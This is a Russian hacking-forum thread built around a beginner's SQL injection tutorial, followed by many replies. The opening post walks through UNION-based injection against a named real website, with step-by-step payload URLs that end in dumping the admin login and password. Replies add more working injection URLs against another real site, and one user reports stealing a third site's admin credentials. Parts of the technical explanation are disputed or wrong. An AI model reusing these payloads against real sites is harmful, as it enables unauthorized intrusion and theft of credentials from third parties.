Моя первая статья. Вообще, я сторонник всевозможных уроков «Дилетантам от дилетанта». Я сам не так давно начал практиковать SQL-инъекции, и именно поэтому, пока еще свежи воспоминания о том, в чем у меня были проблемы, я постараюсь изложить основы наиболее понятным новичку языков. Опытным хакерам-дедам просьба не беспокоиться. Также, я прекрасно знаю, что тема изъезжена вдоль и поперек и что статей по ней великое множество. Но, тем не менее, я хочу претендовать на то, что моя будет самой понятной. Я совсем не хочу поместить в статью все тонкости и нюансы, просто хочу рассказать основы, необходимые для понимания более полных и профессиональных статей.

Благодарности:

Konqi (https://antichat.live/member.php/u/89067/) , ибо именно у него я консультировался в самом начале пути;

Авторам этих статей:

SQL injection и заливка шелла (http://bethehacker.net/2008/12/14/praktika-sql-injection-i-zalivka-shella/)

SQL injection полный FAQ (https://antichat.live/threads/43966/)

Итак, приступим.

Что такое SQL Injection? Это внедрение злоумышленником постороннего SQL-кода при помощи составлении специального URL (адреса, для танкистов). Найти уязвимость очень просто. Как – покажу на примере. Здесь у нас, кстати, рассматриваются MySQL базы данных (далее – БД), причем пятой версии.


http://www.td-vezdehod.ru/news.php?id=774

Казалось бы, что такого особенного в этой странице? 774 – это значение переменной id. Давайте попробуем сунуть к этому значению кавычку:


http://www.td-vezdehod.ru/news.php?id=774'

Хм, новости исчезли. Теперь давайте попробуем выполнить арифметическое действие:


http://www.td-vezdehod.ru/news.php?id=775-1

Отображается то же самое, что и при id=774. Это хорошо. Мы можем с уверенностью сказать, что здесь имеет место быть уязвимость. Кстати, очень важный момент. В этом примере при подстановке кавычки на странице исчезают новости, которые там по идее должны быть – это значит, что вывод ошибок отключен. Но чаще, когда мы находим уязвимость, получается ошибка навроде «1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” ORDER BY p.pid DESC LIMIT 0, 20′ at line 12». Почему же для базы данных наш запрос – ошибочен? Сейчас объясню. Запрос к БД, допустим, выглядит так:


SELECT * FROM news WHERE id='774'

(Если не понимаете логики запроса – «Выбрать все из news где id='774'»). А что получилось, когда мы подставили кавычку?


SELECT * FROM news WHERE id='774''.

Логика и синтаксис полетели к чертям и БД не может понять, что мы требуем.

Вы не забыли, что цель SQL-инъекции – сделать свой запрос? Так вот, делать мы его будем при помощи оператора UNION – он служит для объединения двух запросов в один. Но прежде нюанс – количество столбцов до этого UNION и после должно соответствовать. Пока особо в это не вдумывайтесь, это теория, потом поймете. Будем подбирать количество столбцов при помощи оператора ORDER BY. Еще сверхважный момент – при составлении url вместо пробела пишите плюс. И вот еще – в MySQL начало комментария обозначается двойным дефисом --, причем до и после него должен быть пробел (помните про плюс?). Я также читал, что комментарий обозначается /*, не знаю, если честно, в чем отличия. Ну, на всякий случай, давайте дописывать в конец url знак начала комментария. Итак, начинаем подбирать количество столбцов вот так:


http://www.td-vezdehod.ru/news.php?id=774+order+by+30+--+ Ничего.
http://www.td-vezdehod.ru/news.php?id=774+order+by+10+--+ Содержимое отображается.
http://www.td-vezdehod.ru/news.php?id=774+order+by+20+--+ Отображается.
http://www.td-vezdehod.ru/news.php?id=774+order+by+25+--+ Ничего.
http://www.td-vezdehod.ru/news.php?id=774+order+by+22+--+ Отображается.
http://www.td-vezdehod.ru/news.php?id=774+order+by+23+--+ Ничего.

Крайнее число – 22, стало быть, столбцов 22. Если не поняли – при написании числа, меньшего или равного количеству столбцов, содержимое отображается, а при написании числа, большего, чем количество столбцов, ошибка.

Теперь, собственно, UNION. Перед этим лучше поставьте значение id=-1 или допишите что-нибудь ложное, например, 1=0, чтобы содержимое не отображалось и не мешало думать.


http://www.td-vezdehod.ru/news.php?id=774+and+1=0+--+

Ничего не отображается, естественно.

Сейчас нам нужно узнать версию MySQL. Для этого есть функция version(). Узнаем версию мы так:


http://www.td-vezdehod.ru/news.php?id=774+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+

Вы ведь помните, что у нас 22 столбца?

Отображается какая-то фигня) В том числе такое большое красивое число 19. И вместо числа 19 в url подставляем нашу функцию version():


http://www.td-vezdehod.ru/news.php?id=774+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22 +--+

Версия 5, отлично! Почему отлично? Потому что в MySQL пятой версии есть такая замечательная штука, как INFORMATION_SCHEMA.TABLES, которая содержит имена всех таблиц БД! И если к ней есть доступ, мы сможем подсмотреть имена таблиц:


http://www.td-vezdehod.ru/news.php?id=774+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,group_concat(table _name),20,21,22+from+INFORMATION_SCHEMA.TABLES+--+

Обратите внимание на group_concat(table_name)вместо того же числа 19. Если написать просто table_name, то почти наверняка отобразится одно название и все. А нам нужны все. Результат такого запроса – вывод имен всех таблиц. Теперь просто смотрим на имена и предполагаем, в какой таблице лежит то, что нам нужно. Допустим, нам нужен логин и пароль администратора. Замечаем таблицу AdminSite – давайте посмотрим, что в ней за столбцы. Делаем вот так:


http://www.td-vezdehod.ru/news.php?id=774+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,group_concat(colum n_name),20,21,22+from+INFORMATION_SCHEMA.COLUMNS+w here+table_name=AdminSite+--+

INFORMATION_SCHEMA.COLUMNS, обратите внимание. Не тейблс. И не забудьте «где имя таблицы = AdminSite». Так, а что же такое? Пустота. А давайте попробуем использовать такую замечательную вещь, как CHAR. Ищем любой ascii конвертер. Возьмем этот (http://www.easycalculation.com/ascii-hex.php). Вбиваем AdminSite, ниже показывается «65 100 109 105 110 83 105 116 101». Быстренько пихаем в ворд и делаем замену пробелов на запятые. Потом составляем такой url:


http://www.td-vezdehod.ru/news.php?id=774+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,group_concat(colum n_name),20,21,22+from+INFORMATION_SCHEMA.COLUMNS+w here+table_name=CHAR(65,100,109,105,110,83,105,116 ,101)+--+

Я думаю, вы заметили – CHAR(AdminSite в ascii). Теперь получилось! Итак, у нас есть имена столбцов. Теперь приступаем к самому сладкому - мы видим столбцы «login» и «passw». Очевидно, что в них хранится логин и пароль админа. Делаем такой url:


http://www.td-vezdehod.ru/news.php?id=774+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,group_concat(login ,0x3a,passw),20,21,22+from+AdminSite+--+

Обратите внимание на 0x3a между «login» и «passw». Это двоеточие в hex, если написать там просто двоеточие, не выйдет. Итак, на страницу выводится логин и пароль админа. Ура! Но вот важное замечание: хранить пароли в БД в открытом виде довольно небезопасно, поэтому чаще можно извлечь не пароли, а хеши, которые еще нужно расшифровать. Тут много вариантов – попросить на Античате, попробовать онлайн-сервисы, побрутить самому.

Вот, собственно, и все. Надеюсь, моя статейка поможет кому-то. Имхо, SQL инъекции идеальны для начинающего хацкера

Статья написана исключительно в целях помочь всевозможным администраторам уберечься от SQL-инъекций. За использование полученных из статьи сведений автор отвественности не несет!

Спасибо за внимание, жду аргументированной критики и вопросов)

Вообще, я сторонник всевозможных уроков «Дилетантам от дилетанта».


Так вот значит откуда на античате столько дилетантов.

Совершенно бестолковая и ненужная статья.


Ищем любой ascii конвертер. Возьмем этот.


Да, это конечно сильно, для каждого пука на сайт заходить.

Лучше бы написал статью про HackBar, что ли..

Совершенно бестолковая и ненужная статья.




Опытным хакерам-дедам просьба не беспокоиться.



Статья предназначена исключительно для новичков. Она носит характер обучающе-окунающий и подготавливает новичка для прочтения SQL injection полный FAQ, например.

Статья предназначена исключительно для новичков. Она носит характер обучающе-окунающий и подготавливает новичка для прочтения SQL injection полный FAQ, например.


Эта статья носит хакактер "как проэксплуатировать sql инъекцию на сайте www.td-vezdehod.ru". Ну и в первом посте ты так же пишешь "Статья написана исключительно в целях помочь всевозможным администраторам уберечься от SQL-инъекций", но ни одного слова именно про то, как уберечься, я не увидел.

Эта статья носит хакактер "как проэксплуатировать sql инъекцию на сайте www.td-vezdehod.ru"


Этот сайт взят только в качестве примера.


Статья написана исключительно в целях помочь всевозможным администраторам уберечься от SQL-инъекций


Глупая придирка, ибо в абсолютном большинстве случаев это пишется "на всякий случай".

(Если не понимаете логики запроса – «Выбрать все из news где id='774'»). А что получилось, когда мы подставили кавычку?

SELECT * FROM news WHERE id='774''.



и.....? что получается, мы видим, а что это за собой влечёт, новичку врятли понятно.

Отличная статья, просто шедевр! Я по ней хекингу учился, всем советую" Поднимите свой уровень хакерской догадки до уровней небес! Атвичаю.

лучше бы запостить эту статью не на Ачате а на HackZone-e или т.п.

Boa конечно старание оцениваются, но таких статей здесь море

Урезанная версия статьи Dr.Z3r0 (/thread43966.html)

Ну уж на авторскую никак не тянет...


Статья написана исключительно в целях помочь всевозможным администраторам уберечься от SQL-инъекций.




Что-то я не увидел ни одного совета "всевозможным администраторам" как "уберечься от SQL-инъекций"

Что-то я не увидел ни одного совета "всевозможным администраторам" как "уберечься от SQL-инъекций"


Уже говорилось

Spyder, м?

Konqi, запощу, пожалуй

Boa, что м? Ты же сам никакого представления об инъекциях не имеешь. Зачем статью писать?

Spyder,


Вообще, я сторонник всевозможных уроков «Дилетантам от дилетанта»


Человеку проще передать то, что он сам узнал совсем недавно.

Согласен со Spyder'ом, зачем вводить людей в заблуждение, особенно на их начальном этапе, если ты еще сам пока до конца не понимаешь принцип проведения sql иньекций?

Boa, ну а потом такие дилетанты, вроде тебя, начитавшись хакерских статей, как твоя, начинают

при составлении url вместо пробела писать плюс, ставить до и после комментария пробел, ставят /* - но не знают в чем отличия и так далее

SQL инъекции идеальны для начинающего хацкера


Чемодан =/, юморим по хакерски, etc


Что такое SQL Injection? Это внедрение злоумышленником постороннего SQL-кода при помощи составлении специального URL


Твоя информация не достоверна.


вместо пробела пишите плюс


Пусть все знают. Пробел используется ламерами, а плюс хакерами.

Да что там дальше смотреть... Садись, два! Где мой коньяк?

Не обижайся, статья-говно. И совсем новичек прочитав эту статью на каком-то этапе впадет в депрессию.

Вполне нормальная статейка для начинающих - всё показано на практике.

И вот еще – в MySQL начало комментария обозначается двойным дефисом --,
причем до и после него должен быть пробел


Да ну? xD

мдя..

давай угадаю, купил комп, потом инет

и через 2 месяца(видно по реги) пишешь статью в которой новичок даже не сможет понять отличие между order by и group by и думаешь что тут есть что-то полезное в этой ужасной статье?

(другого слова не смог подобрать) как видно "http://www.td-vezdehod.ru/" твой первый мега взлом ахЪ?

поздравляю ты теперь мастер среди всех новичков-нубов...

и еще кое чо мастер, проясни своим знанием почему когда я хецкаю сайты по твоему супер охеренному варианту 774+and+1=0+...........

то с запросам and+1=0 у меня не ломается сайтег?

других вариантав ты мне не дать, и мое теперь не знать как ломать WWW ((((

http://www.td-vezdehod.ru/news.php?id=774+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,group_concat(login ,0x3a,passw),20,21,22+from+
AdminSite
+
--+




http://www.td-vezdehod.ru/news.php?id=774+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,group_concat(colum n_name),20,21,22+from+INFORMATION_SCHEMA.COLUMNS+w here+table_name=
AdminSite
+
--+


Уважаемый ТС, что это за чудо-запросы?

table_name=AdminSite как я понял - это приватный метод обхода magic_quotes, а + зачем? Я вот уже замечаю в который раз, что перед комментарием ставят такой плюсик, это для чего? =\


Еще сверхважный момент – при составлении url вместо пробела пишите плюс.


Это почему же?

ТС - написание статей - это хорошо, но на эти ошибки уже указывали, нужно их исправить! Если бы ты показал банальную раскрутку скули, но правильно - я бы слова не сказал! Вы просто не понимаете ответственность за такие статьи, сейчас придет новичок, прочтет статью и пойдет ломать интернеты по статье с ошибками! =(

Таких статей море. Эта статья, я думаю, была не нужна. Хватит и этой (https://antichat.live/threads/43966/) в ней более обширно написано, и есть почти всё, что и в этой статье.

И вот еще – в MySQL начало комментария обозначается двойным дефисом --, причем до и после него должен быть пробел


До ненужно. Необходимо только после. Это сделали потому что позволяется арифметическая операция "--".

Вот смотри, показываю один раз наглядным примером:


mysql> SELECT 1--3;
+------+
| 1--3 |
+------+
| 4 |
+------+
1 row in set (0.00 sec)

mysql> SELECT 1-- 3;
-> ;
+---+
| 1 |
+---+
| 1 |
+---+
1 row in set (0.00 sec)

Понимаешь?

Пробел до и после комментария я взял из полного FAQ по скулям, в этом же разделе. Достаточное объяснение?

Достаточное объяснение?


Это, наверное, очень внушительно прозвучать должно было?

--

Достаточное объяснение будет когда ты приведешь мне цитату из официальной документации.

А в документации написано:


From a “-- ” sequence to the end of the line. In MySQL, the “-- ” (double-dash) comment style requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on).

а для меня +--+ это просто дело привыки, как и id=1+and+1=2, а не id=-1(или чтото вроде того)


Статья написана исключительно в целях помочь всевозможным администраторам уберечься от SQL-инъекций. За использование полученных из статьи сведений автор отвественности не несет!


а на это есть вот это /thread30641.html

статья "проводим простейшую SQL инъекцию на примере сайта ***"

думается мне, она способна показать новичку, насколько "просто" иногда можно заполучить пасс админа, и тем самым пробудить у него интерес к тому, чтобы изучить SQL-inj более детально.

понравилось.

Если Ты - новичек, и тебе тоже понравилась эта статья - советую ознакомиться с еще одной (уже указывавшейся ранее) от Dr.Z3r0 (/thread43966.html)

Она читается немного по-тяжелее, да и наглядного примера там нет, но зато она сможет дать тебе ответы на многие вопросы из тех, что у тебя могли возникнуть после прочтения этой статьи.

Привет, ТС.

Я подобрал число таблиц, теперь пытаюсь сделать так: Причем, походу, таблица одна, т.к. только при еденице все отображается.

http://site.com/lol.php?id=-1+union+select+1+--+

Но получаюThe used SELECT statements have a different number of columns​Без всяких других ошибок. Если делаю больше (1,2,3) то получаю еще ошибки ПХП (Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource) Однако подставив select+1,2,3,4,5,6,7,8,9,10,11 я получаю только Варнинги, но и страница корректно не отображается, но она отображается лучше, чем когда подставишь до 12 (у нее есть задуманый автором цвет). Че это такое?

Встречал такие, просто подбирал число, чтобы при следующем числе число всяких ошибок и инфа на странице летели к чертям.

Встречал такие, просто подбирал число, чтобы при следующем числе число всяких ошибок и инфа на странице летели к чертям.


Он это и сделал, но появляется другая ошибка: "The used SELECT statements have a different number of columns". В чем проблема?

В статье др. Зеро написано. А моя и не претендует на объяснение всего и вся.

Встречал такие, просто подбирал число, чтобы при следующем числе число всяких ошибок и инфа на странице летели к чертям.


Ваще не понял, че надо сделать.

При еденице нет ворнингов, но число это явно маловато.

При 11 есть ворнинги, но нет ошибки SQL, т.е. как будто, это искомое число столбцов. Однако, когда я делаю id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11 я получаю варнинги, а не получаю ту "фигню" с "большим и красивым числом 19" (ну у меня, уж наверное, это будет не 19, я это осознаю).

Что же это? Какой-то хитрый/недописаный фильтор? Если ты говоришь, что такое встречал, то, все-таки, что ты при этом делал?

Ваще не понял, че надо сделать.
При еденице нет ворнингов, но число это явно маловато.
При 11 есть ворнинги, но нет ошибки SQL, т.е. как будто, это искомое число столбцов. Однако, когда я делаю id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11 я получаю варнинги, а не получаю ту "фигню" с "большим и красивым числом 19" (ну у меня, уж наверное, это будет не 19, я это осознаю).
Что же это? Какой-то хитрый/недописаный фильтор? Если ты говоришь, что такое встречал, то, все-таки, что ты при этом делал?


скин в личкy, посмотрю

fl00der, клац (https://antichat.live/threads/104591/).


Если ты говоришь, что такое встречал, то, все-таки, что ты при этом делал?


Оставлял и искал другие

fl00der, никакой это не фильтр, это обычный двойной SQL запрос. Вот пример /thread175335-%E4%E2%EE%E9%ED%EE%E9+sql.html

Но увы, здесь нету универсального решения. Для каждого случая нужно составлять свою инъекцию.


Оставлял и искал другие


Аналогично

Boa !

Не обращай внимания на критику. Статья нужная (имхо). Да, она не для гуру, а для самых начинающих. О чем ты и сообщил в самом начале статьи.

Лично мне она дала толчок и желание все же изучать данную тему. ДУмаю, что и многим другим начинающим она поможет.

Уважаемые гуру и кул-хацкеры!

Критиковать и тыкать носом в неточности и поверхностность статьи легче всего.

Но напомню - статья совсем не претендует на звание научного труда или революционные изыскания. И написана скорее для популяризации темы. О чем автор и предупреждает в самом начале (первые два абзаца).

И я считаю что с этой задачей статья справляется.

Очень интересная и познавательная статья мне как новичку очень пригодилась !

написано всё доходчиво и понятно +

Boa, продолжай в том же духе, пиши еще.

Прочитал бы её на пару месяцев раньше, уточнил бы для себя многие моменты.

Для первой просто великолепно...

Привет всем.У меня небольшая непонятка вышла


http://www.xxx.ru/news.php?id=774+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,column_name,20,21, 22+from+INFORMATION_SCHEMA.COLUMNS+w here+table_name=CHAR(65,100,109,105,110,83,105,116 ,101)+--+

Имя таблицы перевел в Ascii так как с простым именем таблицы получаю ошибку.Ради эксперимента переводил в Hax тож отлично работает до такого замечательного момента как вывод информации из столбца.

а именно


union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,passwod,20,21,22+f rom+CHAR(65,100,109,105,110,83,105,116 ,101)+--+

это безобразие типо


CHAR(65,100,109,105,110,83,105,116 ,101)

Менял на Hax(0x5573657273) в надежде что что то изменится но увы не чего не вышло.

Кто подскажет в чем ошибка что не так.

Зачем таблицу чарить?


union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,passwod,20,21,22+f rom+TABLE+--+

"]
shellz[21h] said:
Зачем таблицу чарить?

union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,passwod,20,21,22+f rom+TABLE+--+



Ну если я могу получить имена столбцов только через "Char" или "Hax" (Если указывать просто имя таблицы типа "Users" получу ошибку)

Предположил что так же стоит поступить и при выводе инфы. из столбцов.Но увы пока без успешно.

Спасибо.

Ну если я могу получить имена столбцов только через "Char" или "Hax" (Если указывать просто имя таблицы типа "Users" получу ошибку)
Предположил что так же стоит поступить и при выводе инфы. из столбцов.Но увы пока без успешно.


какая версия mysql, может это вообще не mysql и там другие правила, ?


это безобразие типо

CHAR(65,100,109,105,110,83,105,116 ,101)

Менял на Hax(0x5573657273) в надежде что что то изменится но увы не чего не вышло.


)), не удивительно, а ты задумывался что будет в этом случае )). Если конвертить 0x5573657273 даже в hex то будет 307835353733363537323733, я уже даже не говорю что будет если это будет Hax.

P.S. намек: зачем хексить хекс... может лучше UNHEX(0x5573657273), а если по правде, то я вам не скажу за всю SQL, вся SQL слишком велика, но MySQL 3 по 5 обожают чистый хекс т.е. 0x5573657273, но в данном случае это не прокатит, по краней мере на моей памяти хекс работал только в where и в функциях

какая версия mysql, может это вообще не mysql и там другие правила, ?


Версия 5.0.54

Ну методом научного тыка пытался что то сделать )).

Просто не могу понять как вывести значение столбца.


http://region-info.ru/?city=1&&cid=343&&fid=5067+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,column_name,15,16,17,18,19,20,21,22,23,24+from+I NFORMATION_SCHEMA.columns+where+table_name=unhex(7 573657273)+--+

Так получаю нормальные названия столбцов.Смысла от финта ушами типа Unhex не увидел.


http://region-info.ru/?city=1&&cid=343&&fid=5067+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,passwd,15,16,17,18,19,20,21,22,23,24+from+unhex( 7573657273)+--+

не получается получить строку из столбца passwd и все как только не извращался над ним.

J0cker при выборке данных из конкретной таблицы, нельзя писать имя таблици в ascii или hex

select column from 'имя_таблици_в_плавном_виде'

Версия 5.0.54
Ну методом научного тыка пытался что то сделать )).
Просто не могу понять как вывести значение столбца.

http://region-info.ru/?city=1&&cid=343&&fid=5067+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,column_name,15,16,17,18,19,20,21,22,23,24+from+I NFORMATION_SCHEMA.columns+where+table_name=unhex(7 573657273)+--+

Так получаю нормальные названия столбцов.Смысла от финта ушами типа Unhex не увидел.

http://region-info.ru/?city=1&&cid=343&&fid=5067+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,passwd,15,16,17,18,19,20,21,22,23,24+from+unhex( 7573657273)+--+

не получается получить строку из столбца passwd и все как только не извращался над ним.


Так, давайте выведем все таблицы:


http://region-info.ru/?city=1&&cid=343&&fid=5067+union+select+1,2,3,4,concat%28@i:=0x00,@o :=0x0d0a,benchmark%28400,@o:=CONCAT%28@o,0x0d0a,%2 8SELECT+concat%28table_schema,0x2E,@i:=table_name% 29+from+information_schema.tables+WHERE+table_name %3E@i+order+by+table_name+LIMIT%201%29%29%29,@o%29 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24+--+

Я там нашёлcity_351.admin

Выведем колонки city_351.admin:


http://region-info.ru/?city=1&&cid=343&&fid=5067+union+select+1,2,3,4,group_concat%28colum n_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24+from+information_schema.columns+where +table_name=0x61646d696e+--+

Вместо 0x61646d696e пишем название таблицы в HEX виде. HEX вид можно получить тут (http://x3k.ru)

Вот и всё, таким образом Вы можете выводить колонки таблиц.

Xоть я в этом деле не шарю, единственная статья в которой все понятно прочитал их около 10, но везде урезками, или фразами не понятные новечкам. Автору распект!!!

спасибо

Спасибо за статью,новачкам будет полезно...

И не только...


Спасибо за статью,новачкам будет полезно...


И не только новичкам. Я к примеру кое что новое узнал (мало правда, но всё же)

По-моему, бред подставлять в статье реальный адрес сайта. Это же надо было додуматься до такого...

Читайте лучше полный FAQ по SQL-inj.

По-моему, бред подставлять в статье реальный адрес сайта


Как ни старался, ни нашел ничего бредового. Наглядный пример и все.


Читайте лучше полный FAQ по SQL-inj.


Ну это без комментариев.

Зачем Вы пишет этот гуан?

Есть уже куча подобных материалов на эту тему, которые тоже гуан.

На _данном_форуме_, пожалуй, самый лучший материал был у нуля, к тому же в его теме было очень много дополнений.

Статьи нужно писать для того, чтобы донести до пользователя что то новое и интересное(ну или хотя бы просто интересное), а не для того, чтобы показать всем уровень своих знаний(который, судя по статье, ничтожен).

Подумайте над этим.

Ничего нового, уже много статей есть на эту тему, где всё хорошо разжевано.

Статьи нужно писать для того, чтобы донести до пользователя что то новое и интересное


Статьи нужно писать, чтобы донести до пользователя информацию. Новое и интересное - опционально.

Я хоть где нибудь говорил, что в моей статье есть что-то новое, оригинальное? Я просто описал основы понятным языком, на что и сделан упор.

Статьи нужно писать, чтобы донести до пользователя информацию. Новое и интересное - опционально.
Я хоть где нибудь говорил, что в моей статье есть что-то новое, оригинальное? Я просто описал основы понятным языком, на что и сделан упор.


Тупой копипаст другими словами. Дай асю, пару вопросов задам.. посмотрим на твои знания. В моё время кое кто именно так меня проверял =\

-PRIVAT- покажи мне, где я хоть раз утверждал, что отличный хекер и знаю об инъекциях чуть менее, чем все.

Асю не дам :Р

нормальная статья

еврейский шедевр!

я по этой статье научился всему.. теперь me ломаю телекоммуникационные сети и соц сети..

Как ни старался, ни нашел ничего бредового. Наглядный пример и все.


Весь бред в том, что админы сайта наверняка умеют пользоваться поисковиком или им подкинут ссылку на эту тему. Ты вообще понимаешь, что ты этим самым подставляешь ачат? К тому же, палишь и ленивых новичков, которые добросоветсно будут заходить по ссылкам, т.е. участвовать во взломе. Можно запросто их всех привлечь к ответственности, логов будет предостаточно. А ленивые - потому что не могут посмотеть нормальную статью от Dr.Z3r0 --> https://forum.antichat.net/thread43966.html.

Можно запросто их всех привлечь к ответственности, логов будет предостаточно


логи не являються доказательством

логи не являються доказательством


понимаю, но приятного все равно мало.

К тому же, палишь и ленивых новичков, которые добросоветсно будут заходить по ссылкам, т.е. участвовать во взломе. Можно запросто их всех привлечь к ответственности, логов будет предостаточно.


Они сами решат, стоит переходить по ссылке или не стоит, не?


А ленивые - потому что не могут посмотеть нормальную статью от Dr.Z3r0


Новичку ее будет прочесть довольно сложно.

Новичку ее будет прочесть довольно сложно.


Если сложно -- значит не судьба, что поделать то?

Ноль расписал некоторые отросли этой "атаки" так сказать, "изнутри"(громко сказано, конечно, но примерно так). Вы же научили пользователя подставлять кавычки и все такое даже не объяснив как это происходит.

В Вашей статье нет ничего того, чего нету в остальных говно-статьях о скуль-инжектах. Так же, что о мне подсказывает, что Вы просто переписали своими словами статью нуля и сделали это не лучшим образом.

И не пытайтесь мне что то доказать, у Вас все равно не получится.

Хотел бы отметить, что для начала надо читать не статьи об инжектах, а книжки по скуле, чтоб хоть уметь работать с базой для начала. А на счет статьи, соглашусь с Еррорнео, это не стаья в которой рассказывается теория, а простенький пример использования, способный пробудить интерес. Но указание ссылки на сайт считаю не правильным. Для этих целей можно было зарегить домен и повесить на него сайт, на котором и показывать пример.

Они сами решат, стоит переходить по ссылке или не стоит, не?


Не. Результат-то надо знать какой будет от этих команд. Где же ещё пробывать?!


Новичку ее будет прочесть довольно сложно.


Не новичку, а лентяю.

Ins3t, PvgValo +1

Не. Результат-то надо знать какой будет от этих команд. Где же ещё пробывать?!


Каждый ответственен только за себя, он сам выбирает что ему делать.

И не стоит винить других в этом. Чтобы практиковаться можно и apache/mysql поднять у себя.

Если сложно -- значит не судьба, что поделать то?


Я убит наповал этим аргументом.


Вы же научили пользователя подставлять кавычки и все такое даже не объяснив как это происходит.


Почему выводится ошибка после подстановки кавычки написал. Остальное просто понять из урла.


Так же, что о мне подсказывает, что Вы просто переписали своими словами статью нуля


Я убит наповал этим аргументом. x2


И не пытайтесь мне что то доказать, у Вас все равно не получится.


Я, пожалуй, даже пытаться не буду

Статья гавно, для детей даунов, нолик и так описал как надо, с самого нуля, что да как, да нет же, надо ещё создать статью мол я такой же опупенный хакир как нолик!

FAQ для новичков по раскрутке скуль :3​

http://s003.radikal.ru/i203/1011/37/e58140a0d9d2t.jpg (http://radikal.ru/F/s003.radikal.ru/i203/1011/37/e58140a0d9d2.png.html)

Народ

я ввел из урока последнюю строку

http://www.td-vezdehod.ru/news.php?id=774+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,group_concat(login ,0x3a,passw),20,21,22+from+AdminSite+--+

но не увидел ни логина ни пароля

а вообще статья хорошая для нубов как я

Я пошол в топик ачата где просто дают ссылки на сайты с SQL инъкциями

и почитав эту статью нашол пароль и логин от админки сайта

http://www.dovidkalutsk.com.ua/

Народ
я ввел из урока последнюю строку
http://www.td-vezdehod.ru/news.php?id=774+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,group_concat(login ,0x3a,passw),20,21,22+from+AdminSite+--+
но не увидел ни логина ни пароля


Пробелы лишние сотри, которые форум вставляет)

Я сам не так давно начал практиковать SQL-инъекции


Ну и нахера тогда писате статью,итак полно инфы,кто захочет,тот научиться,кто не захочет/не сможет значит не судьба,помню фразу чью-то давно "Неправильно заученный материал еще хуже незнания" мб как-то по другому,но смысл был таков.


Что такое SQL Injection? Это внедрение злоумышленником постороннего SQL-кода при помощи составлении специального URL (адреса, для танкистов)


Слова POST или cookie вам что-нибудь говорит?Боюсь,что нет


Пока особо в это не вдумывайтесь, это теория, потом поймете


Вахаха,"можете вообще не думать,читая ету статью."


Делаем вот так:

http://www.td-vezdehod.ru/news.php?id=774+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,group_concat(colum n_name),20,21,22+from+INFORMATION_SCHEMA.COLUMNS+w here+table_name=AdminSite+--+



доо


Имхо, SQL инъекции идеальны для начинающего хацкера


О да,а квантовая физика идеальна для первоклассников,инфа 100%


Статья написана исключительно в целях помочь всевозможным администраторам уберечься от SQL-инъекций. За использование полученных из статьи сведений автор отвественности не несет!


Да ты что,в статье про это так много сказано,администраторы прям навалили кучу от счастья.

Вообщем статью стоило назвать "Что надо делать когда у вас есть стандартная скуля на 5 ветке mysql" - и то,целью стояло (ну я так понял) построить грамотную и понятную обсолютно любому статью,тут же ты просто введешь людей в заблуждение.

А еще,вот допустим новичок нарвался на mssql или oracle чтоже он будет делать?Или фильруется что-то,где обходы,ах боюсь предположить,что ты сам нехера не в теме.

Всем новичкам,кто очень хочет научиться и вникнуть в тему советую сделать следующее:

1.)Ни в коем случае не читать етот бред (это лишь совет,выбирать вам)

2.)Идти читать документации (ну или хотябы книжку какую-нибудь,где самые основы и нетолько)

3.)Идти читать статью от нуля (она неподалеку и прикреплена,если будет непонятно,то значит плохо прочитали документацию,либо не судьба)

4.)Ну и конечно же практиковаться,сначала на локалке,скачать денвер (ненадо изобретать велосипед) и поставить уязвимый скрипт,смотреть что да как.

Ну или прочитать енто и идти хекать тырнеты,незная что такое update\drop и так далее=\

P.S. Автор,не обижайся на меня,я лишь высказал свое мнение,надеюсь,что ты когда-нибудь скажешь сам c улыбкой "О боже,как я мог такое написать "

А у меня все получается до того когда тейблы выводятся и все. Конвертировал все в аси а при запросе выводит раз двадцать название тейбла.(user,user,user,user)

ТС, а чем тебя /thread43966.html не устраивает?

ЗЫ Вот она для новичков, а ты для скрипт кидисов написал

ТС, а чем тебя /thread43966.html не устраивает?
ЗЫ Вот она для новичков, а ты для скрипт кидисов написал


http://s012.radikal.ru/i319/1012/14/1a234a8133ee.jpg

Народ
я ввел из урока последнюю строку
http://www.td-vezdehod.ru/news.php?id=774+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,group_concat(login ,0x3a,passw),20,21,22+from+AdminSite+--+
но не увидел ни логина ни пароля


Уязвимость на том сайте была отфиксена еще когда я впервые прочел эту статью.

Хм, действительно пофиксили.

Блин...думал тут решится мой вопрос))

ребят вы чего друг у друга копипастите?))

это обычный копипаст просто своими словами.....

вот я не могу сделать все по инструкции... т .к у меня вылазит вот такая ошибочка,даже не ошибочка а просто вылазит вот такая штука :

